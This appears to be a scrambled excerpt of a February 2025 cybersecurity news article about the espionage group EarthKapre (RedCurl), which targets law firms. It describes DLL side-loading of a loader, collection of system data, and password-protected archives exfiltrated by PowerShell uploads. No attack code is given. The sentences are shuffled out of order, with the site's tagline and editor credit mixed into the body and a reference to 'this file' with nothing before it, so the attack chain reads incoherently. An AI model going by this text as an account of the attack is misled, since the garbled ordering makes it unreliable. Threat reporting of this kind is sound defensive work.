Upon successful execution of the final stage, EarthKapre initiates a series of commands to gather system information, including user account details, system configurations, disk information, and installed antivirus products. A highly sophisticated cyber espionage group known as EarthKapre, also referred to as RedCurl, has been identified targeting private-sector organizations, particularly those in the Law Firms & Legal Services industry. Security researchers at eSentire discovered that they could exploit the limitations of Cloudflare Workers’ free tier (100,000 requests per day) to disrupt the threat actor’s operations. The eSentire Threat Response Unit (TRU) uncovered the group’s recent activities in January 2025, revealing a complex attack chain designed for corporate espionage. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. Opening this file triggers a technique called “DLL side-loading,” where the EarthKapre loader (“netutils.dll”) is executed. Additionally, organizations should implement robust endpoint detection and response (EDR) solutions to detect and prevent sophisticated attacks like those employed by EarthKapre. The collected data is then archived using 7-Zip with password protection and exfiltrated to the cloud storage provider “Tab Digital” via PowerShell PUT requests. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security. eSentire recommends organizations to educate their employees on the dangers of phishing emails, especially those disguised as job applications.
This Cyber News was published on cybersecuritynews.com. Publication date: Fri, 14 Feb 2025 16:40:14 +0000